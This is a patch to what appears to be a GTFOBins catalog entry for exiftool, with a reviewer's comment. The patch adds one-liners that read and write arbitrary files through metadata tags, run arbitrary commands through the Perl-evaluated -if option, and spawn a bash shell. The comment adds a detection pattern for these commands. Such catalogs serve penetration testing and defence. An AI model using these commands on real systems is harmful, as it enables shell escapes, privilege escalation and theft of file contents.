From dd497c2190b18b7296d6e9cf2ad9bded0fbe4564 Mon Sep 17 00:00:00 2001
From: Alexey Zhuchkov
Date: Sat, 1 Feb 2025 13:46:40 +0300
Subject: [PATCH] Add more exiftool commands
---
 _gtfobins/exiftool.md | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
diff --git a/_gtfobins/exiftool.md b/_gtfobins/exiftool.md
index 6dfa379c..69725f4b 100644
--- a/_gtfobins/exiftool.md
+++ b/_gtfobins/exiftool.md
@@ -8,14 +8,38 @@ functions:
 OUTPUT=output_file
 exiftool -filename=$OUTPUT $LFILE
 cat $OUTPUT
+ - description: Exfiltrate file data via metadata tags
+ code: |
+ LFILE=file_read
+ INPUT=input_file
+ exiftool "-description<=$LFILE" --filename $INPUT
 file-write:
 - code: |
 LFILE=file_to_write
 INPUT=input_file
 exiftool -filename=$LFILE $INPUT
+ - description: Write file from metadata tag's content
+ code: |
+ LFILE=file_to_write
+ INPUT=input_file
+ exiftool -description -W $LFILE --filename $INPUT
 sudo:
 - code: |
 LFILE=file_to_write
 INPUT=input_file
 sudo exiftool -filename=$LFILE $INPUT
+ command:
+ - code: |
+ COMMAND=command_to_execute
+ INPUT=input_file
+ exiftool -if "system('$COMMAND');1" --filename $INPUT
+ - description: Run system command and exfiltrate result via metadata tags
+ code: |
+ COMMAND=command_to_execute
+ INPUT=input_file
+ exiftool -userparam "inj=Test" -if "\$\$self{OPTIONS}{UserParam}{inj}=\`$COMMAND\`;1" '-description<$inj' --filename $INPUT
+ shell:
+ - code: |
+ INPUT=input_file
+ exiftool -if "system('bash')" $INPUT
 ---
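Review bot: The first entry under `command:` and the entry under `shell:` carry no `description`, unlike the other entries this patch adds, so nothing tells a reader why they work. A line such as `description: The -if condition is evaluated as a Perl expression, so system() and backticks inside it run as the invoking user.` would explain the mechanism. It would also tell defenders what to look for in process command lines: an `-if` argument containing `system(` or backticks. Separately, the two entries that assign a tag (`"-description<=$LFILE"` under file-read and `'-description<$inj'` under command) appear to rewrite `$INPUT` in place, and as far as I know exiftool then leaves the previous copy beside it with an `_original` suffix. The descriptions should say that the input file is modified.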